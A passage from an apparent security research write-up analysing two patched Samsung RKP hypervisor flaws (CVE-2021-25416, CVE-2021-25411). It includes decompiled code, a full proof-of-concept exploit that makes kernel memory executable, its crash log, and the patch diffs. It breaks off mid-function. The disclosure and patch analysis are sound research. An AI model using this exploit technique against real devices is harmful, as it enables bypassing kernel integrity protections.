- uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
- rkp_policy_violation("Range change permission prohibited");
- } else if (allow != 2 && rkp_deferred_inited) {
- uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
- rkp_policy_violation("Range change permission prohibited");
- }
+ if (rkp_deferred_inited) {
+ if (allow != 2) {
+ uh_log('L', "rkp_paging.c", 643, "RKP_33605b63");
+ rkp_policy_violation("Range change permission prohibited");
+ }
+ if (start_addr > end_addr) {
+ uh_log('L', "rkp_paging.c", 650, "RKP_b3952d08%llxRKP_dd15365a%llx",
+ start_addr, end_addr - start_addr);
+ rkp_policy_violation("Range change permission prohibited");
+ }
+ protected_ranges_overlaps(start_addr, end_addr - start_addr);
+ addr = start_addr;
+ do {
+ rkp_phys_map_lock(addr);
+ if (is_phys_map_s2unmap(addr))
+ rkp_policy_violation("RKP_1b62896c %p", addr);
+ rkp_phys_map_unlock(addr);
+ addr += 0x1000;
+ } while (addr < end_addr);
+ }
// ...
}
+int64_t protected_ranges_overlaps(uint64_t addr, uint64_t size) {
+ if (memlist_overlaps_range(&protected_ranges, addr, size)) {
+ uh_log('L', "pa_restrict.c", 122, "RKP_03f2763e%lx RKP_a54942c8%lx", addr, size);
+ return uh_log('D', "pa_restrict.c", 124, "RKP_03f2763e%lxRKP_c5d4b9a4%lx", addr, size);
+ }
+ return 0;
+}
SVE-2021-20179 (CVE-2021-25416): Possible creating executable kernel page via abusing dynamic load functions
Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 5, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to create executable kernel page outside code area.
The patch adds the proper address validation in RKP to prevent creating executable kernel page.
We found this vulnerability while investigating the "dynamic load" feature of RKP. It allows the kernel to load into memory executable binaries that must be signed by Samsung. It is currently only used for the Fully Interactive Mobile Camera (FIMC) subsystem, and since this subsystem is only available on Exynos devices, this feature is not implemented for Snapdragon devices.
To understand how this feature works, we can start by looking at the kernel sources to find where it is used. By searching for the RKP_DYNAMIC_LOAD
command, we can find two functions that load and unload "dynamic executables": fimc_is_load_ddk_bin
and fimc_is_load_rta_bin
.
In fimc_is_load_ddk_bin
, the kernel starts by filling the rkp_dynamic_load_t
structure with information about the binary. If the binary is already loaded, it invokes the RKP_DYN_COMMAND_RM
subcommand to unload it. It then makes the whole binary memory writable and copies its code and data into it. Finally, it makes the binary code executable by invoking the RKP_DYN_COMMAND_INS
subcommand.
int fimc_is_load_ddk_bin(int loadType)
{
// ...
rkp_dynamic_load_t rkp_dyn;
static rkp_dynamic_load_t rkp_dyn_before = {0};
#endif
// ...
if (loadType == BINARY_LOAD_ALL) {
memset(&rkp_dyn, 0, sizeof(rkp_dyn));
rkp_dyn.binary_base = lib_addr;
rkp_dyn.binary_size = bin.size;
rkp_dyn.code_base1 = memory_attribute[INDEX_ISP_BIN].vaddr;
rkp_dyn.code_size1 = memory_attribute[INDEX_ISP_BIN].numpages * PAGE_SIZE;
#ifdef USE_ONE_BINARY
rkp_dyn.type = RKP_DYN_FIMC_COMBINED;
rkp_dyn.code_base2 = memory_attribute[INDEX_VRA_BIN].vaddr;
rkp_dyn.code_size2 = memory_attribute[INDEX_VRA_BIN].numpages * PAGE_SIZE;
#else
rkp_dyn.type = RKP_DYN_FIMC;
#endif
if (rkp_dyn_before.type)
uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_RM,(u64)&rkp_dyn_before, 0, 0);
memcpy(&rkp_dyn_before, &rkp_dyn, sizeof(rkp_dynamic_load_t));
// ...
ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_ISP_BIN]);
// ...
#ifdef USE_ONE_BINARY
ret = fimc_is_memory_attribute_nxrw(&memory_attribute[INDEX_VRA_BIN]);
// ...
#endif
// ...
memcpy((void *)lib_addr, bin.data, bin.size);
// ...
ret = uh_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, (u64)&rkp_dyn, 0, 0);
// ...
}
The rkp_dynamic_load_t
structure is filled with the type of the executable (RKP_DYN_FIMC
if it has one code segment, RKP_DYN_FIMC_COMBINED
if it has two), the base address and size of the whole binary, and the base address and size of its code segment(s).
typedef struct dynamic_load_struct{
u32 type;
u64 binary_base;
u64 binary_size;
u64 code_base1;
u64 code_size1;
u64 code_base2;
u64 code_size2;
} rkp_dynamic_load_t;
In the hypervisor, the handler of the RKP_DYNAMIC_LOAD
command and its subcommands is the rkp_cmd_dynamic_load
function. It dispatches the subcommand (RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT
, RKP_DYN_COMMAND_INS
, or RKP_DYN_COMMAND_RM
) to the appropriate function.
int64_t rkp_cmd_dynamic_load(saved_regs_t* regs) {
// ...
// Get the subcommand and convert the argument structure address.
type = regs->x2;
rkp_dyn = (rkp_dynamic_load_t*)rkp_get_pa(regs->x3);
// Call the handler specific to the subcommand type.
if (type == RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT) {
res = dynamic_breakdown_before_init(rkp_dyn);
if (res) {
uh_log('W', "rkp_dynamic.c", 392, "dynamic_breakdown_before_init failed");
}
} else if (type == RKP_DYN_COMMAND_INS) {
res = dynamic_load_ins(rkp_dyn);
if (!res) {
uh_log('L', "rkp_dynamic.c", 406, "dynamic_load ins type:%d success", rkp_dyn->type);
}
} else if (type == RKP_DYN_COMMAND_RM) {
res = dynamic_load_rm(rkp_dyn);
if (!res) {
uh_log('L', "rkp_dynamic.c", 400, "dynamic_load rm type:%d success", rkp_dyn->type);
}
} else {
res = 0;
}
// Put the return code in the memory referenced by x4.
ret_va = regs->x4;
if (ret_va) {
*virt_to_phys_el1(ret_va) = res;
}
// Put the return code in x0.
regs->x0 = res;
return res;
}
The RKP_DYN_COMMAND_BREAKDOWN_BEFORE_INIT
subcommand is of no interest to us since it can only be called prior to initialization.
The RKP_DYN_COMMAND_INS
subcommand, used to load a binary, is handled by dynamic_load_ins
. It calls a bunch of functions sequentially:
- dynamic_load_check to validate the executable's information;
- dynamic_load_protection to make the code segment(s) R-X in the stage 2;
- dynamic_load_verify_signing to verify the executable's signature;
- dynamic_load_make_rox to make the code segment(s) R-X in the stage 1;
- dynamic_load_add_executable to add the code segment(s) to the executable_regions memlist;
- dynamic_load_add_dynlist to add the executable to the dynamic_load_regions memlist.

If any of the functions it calls fail, except dynamic_load_check, it will try to undo its changes by calling the same functions as in the unloading path.
int64_t dynamic_load_ins(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Validate the argument structure.
if (dynamic_load_check(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 273, "dynamic_load_check failed");
return 0xf13c0001;
}
// Make the code segment(s) read-only executable in the stage 2.
if (dynamic_load_protection(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 280, "dynamic_load_protection failed");
res = 0xf13c0002;
goto EXIT_RW;
}
// Verify the signature of the dynamic executable.
if (dynamic_load_verify_signing(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 288, "dynamic_load_verify_signing failed");
res = 0xf13c0003;
goto EXIT_RW;
}
// Make the code segment(s) read-only executable in the stage 1.
if (dynamic_load_make_rox(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 295, "dynamic_load_make_rox failed");
res = 0xf13c0004;
goto EXIT_SET_PXN;
}
// Add the code segment(s) to the executable_regions memlist.
if (dynamic_load_add_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 303, "dynamic_load_add_executable failed");
res = 0xf13c0005;
goto EXIT_RM_EXECUTABLE;
}
// Add the binary's address range to the dynamic_load_regions memlist.
if (dynamic_load_add_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 309, "dynamic_load_add_dynlist failed");
res = 0xf13c0006;
goto EXIT_RM_DYNLIST;
}
return 0;
EXIT_RM_DYNLIST:
// Undo: remove the binary's address range from the dynamic_load_regions memlist.
if (dynamic_load_rm_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 317, "fail to dynamic_load_rm_dynlist, later in dynamic_load_ins");
}
EXIT_RM_EXECUTABLE:
// Undo: remove the code segment(s) from the executable_regions memlist.
if (dynamic_load_rm_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 320, "fail to dynamic_load_rm_executable, later in dynamic_load_ins");
}
EXIT_SET_PXN:
// Undo: make the code segment(s) read-only non-executable in the stage 1.
if (dynamic_load_set_pxn(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 323, "fail to dynamic_load_set_pxn, later in dynamic_load_ins");
}
EXIT_RW:
// Undo: make the code segment(s) read-write executable in the stage 2.
if (dynamic_load_rw(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 326, "fail to dynamic_load_rw, later in dynamic_load_ins");
}
return res;
}
The RKP_DYN_COMMAND_RM
subcommand, used to unload a binary, is handled by dynamic_load_rm
. It also calls a bunch of functions sequentially:
- dynamic_load_rm_dynlist to remove the executable from the dynamic_load_regions memlist;
- dynamic_load_rm_executable to remove the code segment(s) from the executable_regions memlist;
- dynamic_load_set_pxn to make the code segment(s) R-- in the stage 1;
- dynamic_load_rw to make the code segment(s) RWX in the stage 2.

int64_t dynamic_load_rm(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the binary's address range from the dynamic_load_regions memlist.
if (dynamic_load_rm_dynlist(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 338, "dynamic_load_rm_dynlist failed");
res = 0xf13c0007;
}
// Remove the code segment(s) from the executable_regions memlist.
else if (dynamic_load_rm_executable(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 345, "dynamic_load_rm_executable failed");
res = 0xf13c0008;
}
// Make the code segment(s) read-only non-executable in the stage 1.
else if (dynamic_load_set_pxn(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 352, "dynamic_load_set_pxn failed");
res = 0xf13c0009;
}
// Make the code segment(s) read-write executable in the stage 2.
else if (dynamic_load_rw(rkp_dyn)) {
uh_log('W', "rkp_dynamic.c", 359, "dynamic_load_rw failed");
res = 0xf13c000a;
} else {
res = 0;
}
return res;
}
dynamic_load_check
ensures the address range of the binary doesn't overlap with other currently loaded binaries or with memory that is read-only in the stage 2. Unfortunately, this is not enough. In particular, it doesn't ensure that the code segments are within the binary's address range. Please note that if pgt_bitmap_overlaps_range
detects an overlap, uh_log
is called with a D
(debug) log level, which will result in a panic.
int64_t dynamic_load_check(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Dynamic executables of type RKP_DYN_MODULE are not allowed to be loaded.
if (rkp_dyn->type == RKP_DYN_MODULE) {
return -1;
}
// Check if the binary's address range overlaps with the dynamic_load_regions memlist.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
uh_log('L', "rkp_dynamic.c", 71, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,
rkp_dyn->binary_size);
return -1;
}
// Check if any of the pages of the binary's address range is marked read-only in the ro_bitmap.
if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size)) {
uh_log('D', "rkp_dynamic.c", 76, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
}
return 0;
}
dynamic_load_protection
makes the code segment(s) R-X
in the stage 2 by calling rkp_s2_range_change_permission
.
int64_t dynamic_load_protection(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-only executable in the second stage.
code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0x80 /* read-only */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 116, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
rkp_dyn->code_size1);
return -1;
}
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Make the second code segment read-only executable in the second stage.
code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0x80 /* read-only */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 124, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
rkp_dyn->code_size2);
return -1;
}
return 0;
}
dynamic_load_verify_signing
verifies the signature of the whole binary's address space (remember that the binary's code and data were copied into that space by the kernel). Signature verification can be disabled by the kernel by setting NO_FIMC_VERIFY
in the rkp_start
command.
int64_t dynamic_load_verify_signing(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Check if signature verification was disabled by the kernel in rkp_start.
if (NO_FIMC_VERIFY) {
uh_log('L', "rkp_dynamic.c", 135, "FIMC Signature verification Skip");
return 0;
}
// Only the signature of RKP_DYN_FIMC and RKP_DYN_FIMC_COMBINED dynamic executables is checked.
if (rkp_dyn->type != RKP_DYN_FIMC && rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Call fmic_signature_verify that does the actual signature checking.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (fmic_signature_verify(binary_base_pa, rkp_dyn->binary_size)) {
uh_log('W', "rkp_dynamic.c", 143, "FIMC Signature verification failed %lx, %lx", binary_base_pa,
rkp_dyn->binary_size);
return -1;
}
uh_log('L', "rkp_dynamic.c", 146, "FIMC Signature verification Success %lx, %lx", rkp_dyn->binary_base,
rkp_dyn->binary_size);
return 0;
}
dynamic_load_make_rox
makes the code segment(s) R-X
in the stage 1 by calling rkp_set_range_to_rox
.
int64_t dynamic_load_make_rox(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-only executable in the first stage.
res = rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Make the second code segment read-only executable in the first stage.
res += rkp_set_range_to_rox(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
}
return res;
}
dynamic_load_add_executable
adds the code segment(s) to the list of executable memory regions.
int64_t dynamic_load_add_executable(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Add the first code segment to the executable_regions memlist.
res = memlist_add(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Add the second code segment to the executable_regions memlist.
res += memlist_add(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2);
}
return res;
}
dynamic_load_add_dynlist
adds the binary's address range to the list of dynamically loaded executables.
int64_t dynamic_load_add_dynlist(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Allocate a copy of the argument structure.
dynlist_entry = static_heap_alloc(0x38, 0);
memcpy(dynlist_entry, rkp_dyn, 0x38);
// Add the binary's address range to the dynamic_load_regions memlist and save the binary information alongside.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
return memlist_add_extra(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, dynlist_entry);
}
dynamic_load_rm_dynlist
removes the binary's address range from the list of dynamically loaded executables.
int64_t dynamic_load_rm_dynlist(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the binary's address range from the dynamic_load_regions memlist and retrieve the saved binary information.
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
res = memlist_remove_exact(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size, &dynlist_entry);
if (res) {
return res;
}
if (!dynlist_entry) {
uh_log('W', "rkp_dynamic.c", 205, "No dynamic descriptor");
return -11;
}
// Compare the first code segment base address and size with the saved binary information.
res = 0;
if (rkp_dyn->code_base1 != dynlist_entry->code_base1 || rkp_dyn->code_size1 != dynlist_entry->code_size1) {
--res;
}
// Compare the second code segment base address and size with the saved binary information.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED &&
(rkp_dyn->code_base2 != dynlist_entry->code_base2 || rkp_dyn->code_size2 != dynlist_entry->code_size2)) {
--res;
}
// Free the copy of the argument structure.
static_heap_free(dynlist_entry);
return res;
}
dynamic_load_rm_executable
removes the code segment(s) from the list of executable memory regions.
int64_t dynamic_load_rm_executable(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Remove the first code segment from the executable_regions memlist.
res = memlist_remove_exact(&executable_regions, rkp_dyn->code_base1, rkp_dyn->code_size1, 0);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Remove the second code segment from the executable_regions memlist.
res += memlist_remove_exact(&executable_regions, rkp_dyn->code_base2, rkp_dyn->code_size2, 0);
}
return res;
}
dynamic_load_set_pxn
makes the code segment(s) non-executable in the stage 1 by calling rkp_set_range_to_pxn
.
int64_t dynamic_load_set_pxn(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment non-executable in the first stage.
res = rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base1, rkp_dyn->code_base1 + rkp_dyn->code_size1);
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
// Make the second code segment non-executable in the first stage.
res += rkp_set_range_to_pxn(INIT_MM_PGD, rkp_dyn->code_base2, rkp_dyn->code_base2 + rkp_dyn->code_size2);
}
return res;
}
dynamic_load_rw
makes the code segment(s) RWX
in the stage 2 by calling rkp_s2_range_change_permission
.
int64_t dynamic_load_rw(rkp_dynamic_load_t* rkp_dyn) {
// ...
// Make the first code segment read-write executable in the second stage.
code_base1_pa = rkp_get_pa(rkp_dyn->code_base1);
if (rkp_s2_range_change_permission(code_base1_pa, rkp_dyn->code_size1 + code_base1_pa, 0 /* read-write */,
1 /* executable */, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 239, "Dynamic load: fail to make first code range RO %lx, %lx", rkp_dyn->code_base1,
rkp_dyn->code_size1);
return -1;
}
// Dynamic executables of the type RKP_DYN_FIMC_COMBINED have two code segments.
if (rkp_dyn->type != RKP_DYN_FIMC_COMBINED) {
return 0;
}
// Make the second code segment read-write executable in the second stage.
code_base2_pa = rkp_get_pa(rkp_dyn->code_base2);
if (rkp_s2_range_change_permission(code_base2_pa, rkp_dyn->code_size2 + code_base2_pa, 0, 1, 2) < 0) {
uh_log('L', "rkp_dynamic.c", 247, "Dynamic load: fail to make second code range RO %lx, %lx", rkp_dyn->code_base2,
rkp_dyn->code_size2);
return -1;
}
return 0;
}
From the high-level description of the functions given above, we can notice in particular that if we give a code segment that is currently R-X
or RW-
in the stage 2, dynamic_load_protection
will make it R-X
. And if an error occurs after that, dynamic_load_rw
will be called to undo the changes and make it RWX
, regardless of the original permissions. Thus, we can effectively make kernel memory executable.
In practice, to pass the checks in dynamic_load_check
, we need to specify a binary_base
that is in writable memory in the stage 2, but code_base1
and code_base2
can be in read-only memory. Now, to trigger a failure, we can specify a code_base2
that is not page-aligned. That way, the second call to rkp_s2_range_change_permission
in dynamic_load_protection
will fail, and dynamic_load_rw
will be executed. The second call to rkp_s2_range_change_permission
in dynamic_load_rw
will also fail, but that's not an issue.
The vulnerability allows us to change memory that is currently R-X
or RW-
in the stage 2 to RWX
. In order to execute arbitrary code at EL1 using this vulnerability, the simplest way is to find a physical page that is already executable in the stage 1, so that we only have to modify the stage 2 permissions. Then we can use the virtual address of this page in the kernel's physmap (the Linux kernel physmap, not RKP's physmap
) as a second mapping that is writable. By writing our code to this second mapping and executing it from the first, we can achieve arbitrary code execution.
stage 1 stage 2
EXEC_VA ---------+--------> TARGET_PA
R-X | R-X
| ^---- will be changed to RWX
WRITE_VA ---------+
RW-
By dumping the page tables of the stage 1, we can easily find a double-mapped page.
...
ffffff80fa500000 - ffffff80fa700000 (PTE): R-X at 00000008f5520000 - 00000008f5720000
...
ffffffc800000000 - ffffffc880000000 (PMD): RW- at 0000000880000000 - 0000000900000000
...
If we pick our executable mapping EXEC_VA at 0xFFFFFF80FA6FF000 (inside the R-X region starting at 0xFFFFFF80FA500000), we can deduce that the writable mapping will be at 0xFFFFFFC87571F000:
>>> EXEC_VA = 0xFFFFFF80FA6FF000
>>> TARGET_PA = EXEC_VA - 0xFFFFFF80FA500000 + 0x00000008F5520000
>>> TARGET_PA
0x8F571F000
>>> WRITE_VA = 0xFFFFFFC800000000 + TARGET_PA - 0x0000000880000000
>>> WRITE_VA
0xFFFFFFC87571F000
And by dumping the page tables of the stage 2, we can confirm that it is initially mapped as R-X
.
...
0x8f571f000-0x8f5720000: S2AP=1, XN[1]=0
...
The last important thing we need to take into account when writing our exploit is the data and instruction caches. To be safe, in our exploit, we decided to prefix the code to execute with some "bootstrap" instructions that will clean the caches.
#define UH_APP_RKP 0xC300C002
#define RKP_DYNAMIC_LOAD 0x20
#define RKP_DYN_COMMAND_INS 0x01
#define RKP_DYN_FIMC_COMBINED 0x03
/* these 2 VAs point to the same PA */
#define EXEC_VA 0xFFFFFF80FA6FF000UL
#define WRITE_VA 0xFFFFFFC87571F000UL
/* bootstrap code to clean the caches */
#define DC_IVAC_IC_IVAU 0xD50B7520D5087620UL
#define DSB_ISH_ISB 0xD5033FDFD5033B9FUL
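/* For reference, the two constants above pack four AArch64 instructions
 * (stored little-endian, low word first), matching the "Code:" line of the
 * kernel log shown further down:
 *   0xD5087620: dc ivac, x0  -- invalidate data cache line by VA
 *   0xD50B7520: ic ivau, x0  -- invalidate instruction cache line by VA
 *   0xD5033B9F: dsb ish      -- data synchronization barrier
 *   0xD5033FDF: isb          -- instruction synchronization barrier
 * (we assume kernel_exec passes the address to invalidate in x0) */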
void exploit() {
/* fill the structure given as argument */
uint64_t rkp_dyn = kernel_alloc(0x38);
kernel_write(rkp_dyn + 0x00, RKP_DYN_FIMC_COMBINED); // type
kernel_write(rkp_dyn + 0x08, kernel_alloc(0x1000)); // binary_base
kernel_write(rkp_dyn + 0x10, 0x1000); // binary_size
kernel_write(rkp_dyn + 0x18, EXEC_VA); // code_base1
kernel_write(rkp_dyn + 0x20, 0x1000); // code_size1
kernel_write(rkp_dyn + 0x28, EXEC_VA + 1); // code_base2
kernel_write(rkp_dyn + 0x30, 0x1000); // code_size2
/* call the hypervisor to make the page RWX */
kernel_hyp_call(UH_APP_RKP, RKP_DYNAMIC_LOAD, RKP_DYN_COMMAND_INS, rkp_dyn);
/* copy the code using the writable mapping */
uint32_t code[] = {
0xDEADBEEF,
0,
};
kernel_write(WRITE_VA + 0x00, DC_IVAC_IC_IVAU);
kernel_write(WRITE_VA + 0x08, DSB_ISH_ISB);
for (int i = 0; i < sizeof(code) / sizeof(uint64_t); ++i)
kernel_write(WRITE_VA + 0x10 + i * 8, code[i * 2]);
/* and execute it using the executable mapping */
kernel_exec(EXEC_VA, WRITE_VA);
}
As a result of running the proof of concept, we get an undefined instruction exception that we can observe in the kernel log (note the (deadbeef)
part):
<2>[ 207.365236] [3: rkp_exploit:15549] sec_debug_set_extra_info_fault = UNDF / 0xffffff80fa6ff018
<2>[ 207.365310] [3: rkp_exploit:15549] sec_debug_set_extra_info_fault: 0x1 / 0x726ff018
<0>[ 207.365338] [3: rkp_exploit:15549] undefined instruction: pc=00000000dec42a2e, rkp_exploit[15549] (esr=0x2000000)
<6>[ 207.365361] [3: rkp_exploit:15549] Code: d5087620 d50b7520 d5033b9f d5033fdf (deadbeef)
<0>[ 207.365372] [3: rkp_exploit:15549] Internal error: undefined instruction: 2000000 [#1] PREEMPT SMP
<4>[ 207.365386] [3: rkp_exploit:15549] Modules linked in:
<0>[ 207.365401] [3: rkp_exploit:15549] Process rkp_exploit (pid: 15549, stack limit = 0x00000000b4f56d76)
<0>[ 207.365418] [3: rkp_exploit:15549] debug-snapshot: core register saved(CPU:3)
<0>[ 207.365430] [3: rkp_exploit:15549] L2ECTLR_EL1: 0000000000000007
<0>[ 207.365438] [3: rkp_exploit:15549] L2ECTLR_EL1 valid_bit(30) is NOT set (0x0)
<0>[ 207.365456] [3: rkp_exploit:15549] CPUMERRSR: 0000000000040001, L2MERRSR: 0000000013000000
<0>[ 207.365468] [3: rkp_exploit:15549] CPUMERRSR valid_bit(31) is NOT set (0x0)
<0>[ 207.365480] [3: rkp_exploit:15549] L2MERRSR valid_bit(31) is NOT set (0x0)
<0>[ 207.365491] [3: rkp_exploit:15549] debug-snapshot: context saved(CPU:3)
<6>[ 207.365541] [3: rkp_exploit:15549] debug-snapshot: item - log_kevents is disabled
<6>[ 207.365574] [3: rkp_exploit:15549] TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 89
<4>[ 207.365590] [3: rkp_exploit:15549] CPU: 3 PID: 15549 Comm: rkp_exploit Tainted: G W 4.14.113 #14
<4>[ 207.365602] [3: rkp_exploit:15549] Hardware name: Samsung A51 EUR OPEN REV01 based on Exynos9611 (DT)
<4>[ 207.365617] [3: rkp_exploit:15549] task: 00000000dcac38cb task.stack: 00000000b4f56d76
<4>[ 207.365632] [3: rkp_exploit:15549] PC is at 0xffffff80fa6ff018
<4>[ 207.365644] [3: rkp_exploit:15549] LR is at 0xffffff80fa6ff004
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The bug was only present in the binaries of Exynos devices (because the "dynamic load" feature is not available for Snapdragon devices), including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled.
Here are the immediate remediation steps we suggested to Samsung:
- Implement thorough checking in the "dynamic executable" commands:
- The code segment(s) should not overlap any read-only pages
(maybe checking the ro_bitmap or calling is_phys_map_free is enough)
- dynamic_load_rw should not make the code segment(s) executable on failure
(to prevent abusing it to create executable kernel pages...)
- Ensure signature checking is enabled (it was disabled on some devices)
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
Changes were made to the dynamic_load_check
function. As suggested, checks were added to ensure that both code segments are within the binary's address range. The new checks don't account for integer overflows on all the base + size
additions, but we noticed that this was addressed later, in the October security update.
int64_t dynamic_load_check(rkp_dynamic_load_t *rkp_dyn) {
// ...
if (rkp_dyn->type == RKP_DYN_MODULE)
return -1;
+ binary_base = rkp_dyn->binary_base;
+ binary_end = rkp_dyn->binary_size + binary_base;
+ code_base1 = rkp_dyn->code_base1;
+ code_end1 = rkp_dyn->code_size1 + code_base1;
+ if (code_base1 < binary_base || code_end1 > binary_end) {
+ uh_log('L', "rkp_dynamic.c", 71, "RKP_21f66fc1");
+ return -1;
+ }
+ if (rkp_dyn->type == RKP_DYN_FIMC_COMBINED) {
+ code_base2 = rkp_dyn->code_base2;
+ code_end2 = rkp_dyn->code_size2 + code_base2;
+ if (code_base2 < binary_base || code_end2 > binary_end) {
+ uh_log('L', "rkp_dynamic.c", 77, "RKP_915550ac");
+ return -1;
+ }
+ if ((code_base1 > code_base2 && code_base1 < code_end2)
+ || (code_base2 > code_base1 && code_base2 < code_end1)) {
+ uh_log('L', "rkp_dynamic.c", 83, "RKP_67b1bc82");
+ return -1;
+ }
+ }
binary_base_pa = rkp_get_pa(rkp_dyn->binary_base);
if (memlist_overlaps_range(&dynamic_load_regions, binary_base_pa, rkp_dyn->binary_size)) {
uh_log('L', "rkp_dynamic.c", 91, "dynamic_load[%p~%p] is overlapped with another", binary_base_pa,rkp_dyn->binary_size);
return -1;
}
if (pgt_bitmap_overlaps_range(binary_base_pa, rkp_dyn->binary_size))
uh_log('D', "rkp_dynamic.c", 96, "dynamic_load[%p~%p] is ro", binary_base_pa, rkp_dyn->binary_size);
return 0;
}
Since the binary's address range is then checked against the ro_bitmap
using pgt_bitmap_overlaps_range
, it is no longer possible to change memory from R-X
to RWX
in the stage 2. It is still possible to change memory that is RW-
to RWX
, but there are already RWX
pages in the stage 2. The hypervisor also ensures that if such a page is mapped as executable in the stage 1, it is made read-only in the stage 2.
SVE-2021-20176 (CVE-2021-25411): Vulnerable api in RKP allows attackers to write read-only kernel memory
Severity: Moderate
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Improper address validation vulnerability in RKP api prior to SMR JUN-2021 Release 1 allows root privileged local attackers to write read-only kernel memory.
The patch adds a proper address validation check to prevent unprivileged write to kernel memory.
The last vulnerability comes from a limitation of virt_to_phys_el1
, the function used by RKP to convert a virtual address into a physical address.
It uses the AT S12E1R
(Address Translate Stages 1 and 2 EL1 Read) and AT S12E1W
(Address Translate Stages 1 and 2 EL1 Write) instructions that perform a full (stages 1 and 2) address translation, as if the kernel was trying to read or write, respectively, at that virtual address. By checking the PAR_EL1
(Physical Address Register) register, the function can know if the address translation succeeded and retrieve the physical address.
More specifically, virt_to_phys_el1
uses AT S12E1R
, and if that first address translation fails, it then uses AT S12E1W
. That means that any virtual address that can be read and/or written by the kernel can be successfully translated by the function.
uint64_t virt_to_phys_el1(uint64_t addr) {
// ...
// Ignore null VAs.
if (!addr) {
return 0;
}
cs_enter(s2_lock);
// Try to translate the VA using the AT S12E1R instruction (simulate a kernel read).
